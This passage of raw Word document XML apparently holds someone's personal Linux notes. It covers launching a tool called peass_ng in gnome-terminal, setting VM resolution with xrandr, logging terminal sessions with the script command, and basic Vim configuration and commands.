          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run peass_ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This opens up a gnome-terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't already have gnome-terminal, here is how to download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install gnome-terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5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56">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rni6mdd2v99s" w:id="546"/>
      <w:bookmarkEnd w:id="546"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view and change resolution of VM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To view the resolution in VM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1319"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xrandr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To change it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xrandr --output Virtual1 --mode 1600x900</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For VMWARE, I like having </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1600x900</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then in my VM settings I have the maximum resolution set as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3840x2160</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On virtual box, I have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1646x915 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which seems to the best one for virtual box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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63">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i0e7od8otbx1" w:id="547"/>
      <w:bookmarkEnd w:id="547"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B65">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever want to save your command and output to a file, this is how you do it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Every time you open a tab, run this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script -af ~/chat.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then whenever you type in something, it will save it to a file in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/chat.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once you want to read it, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ansi2txt &lt; chat.log &gt; chat_clean.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subl chat_clean.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="874"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's still kind of buggy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To stop the logging:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Either close the tab, or…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B76">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cia3c0j127fo" w:id="548"/>
      <w:bookmarkEnd w:id="548"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B77">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1391">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://vimschool.netlify.app/introduction/</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3B78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B79">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0. Configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to add line numbers to configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vim ~/.vimrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add this line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to temporarily add line numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="747"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:set number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B81">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Open and Close VIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vim filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit VIM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
